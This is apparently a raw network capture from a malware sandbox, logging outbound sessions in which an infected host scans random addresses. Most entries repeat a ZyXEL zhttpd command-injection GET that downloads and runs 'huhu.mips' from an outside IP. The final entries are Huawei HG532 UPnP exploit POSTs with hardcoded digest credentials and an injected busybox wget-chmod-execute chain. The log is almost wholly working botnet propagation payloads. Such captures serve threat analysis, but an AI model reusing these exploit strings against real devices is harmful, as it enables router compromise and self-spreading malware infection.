                                                Jan 29, 2024 07:08:03.661075115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8274192.168.2.2350452187.164.131.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.661098003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8275192.168.2.2358224153.17.53.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.661145926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8276192.168.2.2360084130.30.196.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.661173105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8277192.168.2.2358048142.227.190.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.661204100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8278192.168.2.2336290219.17.208.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.661264896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8279192.168.2.235258814.167.25.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.661314964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8280192.168.2.2335748174.224.101.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.661330938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8281192.168.2.2345574106.20.249.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.661379099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8282192.168.2.2359384112.164.240.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.661433935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8283192.168.2.235030231.54.249.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.661448002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8284192.168.2.2340918128.182.135.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.661489010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8285192.168.2.2358774210.228.213.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.661554098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8286192.168.2.2351866122.143.248.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.661597967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8287192.168.2.2356042133.247.44.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.661648035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8288192.168.2.2336334198.115.140.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.661693096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8289192.168.2.2346810143.3.112.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.661708117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8290192.168.2.236024890.135.222.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.661751032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8291192.168.2.23328441.135.141.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.661799908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8292192.168.2.2333418186.220.216.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.661859035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8293192.168.2.2334980119.136.183.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.661906004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8294192.168.2.234108053.242.59.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.661946058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8295192.168.2.2342446155.115.48.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.661959887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8296192.168.2.2360096110.29.66.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.662005901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8297192.168.2.2358214113.208.88.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.662060976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8298192.168.2.2349148109.12.67.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.662098885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8299192.168.2.2347454189.178.63.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.662156105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8300192.168.2.233830469.65.62.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.662190914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8301192.168.2.234308670.102.144.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.662235022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8302192.168.2.2353540174.197.15.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.662278891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8303192.168.2.2339110172.176.1.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.662326097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8304192.168.2.2354510144.80.183.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.662374973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8305192.168.2.2357832184.33.253.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.662396908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8306192.168.2.233719677.250.203.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.662435055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8307192.168.2.2351494129.224.23.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.662496090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8308192.168.2.235695896.117.226.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.662524939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8309192.168.2.234107272.73.228.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.662587881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8310192.168.2.2358330179.87.212.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.662606001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8311192.168.2.2357208168.175.3.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.662671089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8312192.168.2.2340702106.0.84.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.662724972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8313192.168.2.2338778182.204.162.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.662776947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8314192.168.2.233830883.74.233.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.665863037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8315192.168.2.2334794191.61.254.18837215
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.473670959 CET828OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                Connection: keep-alive
                                                Accept: */*
                                                Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                Content-Length: 471
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 68 75 68 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 45.142.182.123 -l /tmp/linuxxx -r /huhu.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                Jan 29, 2024 07:08:05.159404039 CET828OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                Connection: keep-alive
                                                Accept: */*
                                                Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                Content-Length: 471
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 68 75 68 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 45.142.182.123 -l /tmp/linuxxx -r /huhu.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                Jan 29, 2024 07:08:06.503209114 CET828OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                Connection: keep-alive
                                                Accept: */*
                                                Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                Content-Length: 471
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 68 75 68 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 45.142.182.123 -l /tmp/linuxxx -r /huhu.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8316192.168.2.234754453.80.195.86443
                                                TimestampBytes transferredDirectionData
